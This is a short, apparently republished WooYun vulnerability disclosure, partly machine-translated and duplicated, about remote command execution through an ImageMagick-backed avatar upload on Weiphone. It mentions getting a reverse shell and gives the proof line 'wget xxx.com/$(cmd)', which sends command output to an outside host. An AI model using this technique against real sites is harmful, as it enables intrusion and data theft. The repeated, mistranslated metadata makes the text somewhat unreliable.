weiphone某处命令执行
漏洞标题 weiphone某处命令执行 相关厂商 weiphone 漏洞作者 路人甲 提交时间 2016-05-05 18:27 公开时间 2016-06-19 21:20 漏洞类型 命令执行 危害等…
漏洞标题
Weiphone在哪里执行
相关制造商
WEIPHONE
漏洞作者
过路人
提交时间
2016-05-05 18: 27
公共时间
2016-06-19 21: 20
漏洞类型
命令执行
危险等级
高
自我评估等级
20
漏洞状态
制造商已确认
标签标签
远程命令执行
漏洞详细信息
构建图片
找到一个调用imagemagick并上传它的头像上传点。
弹回壳
漏洞证明:
使用wget xxx.com/$(cmd)来回显示
修理计划:
根据官方imagemagick办公室
版权声明:请注明出处。居民A @乌云
找到一个调用imagemagick并上传它的头像上传点。
弹回壳
漏洞证明:
使用wget xxx.com/$(cmd)来回显示
修理计划:
根据官方imagemagick办公室
版权声明:请注明出处。居民A @乌云
- 发表于 2016-07-17 08:00
- 阅读 ( 523 )
- 分类:黑客技术
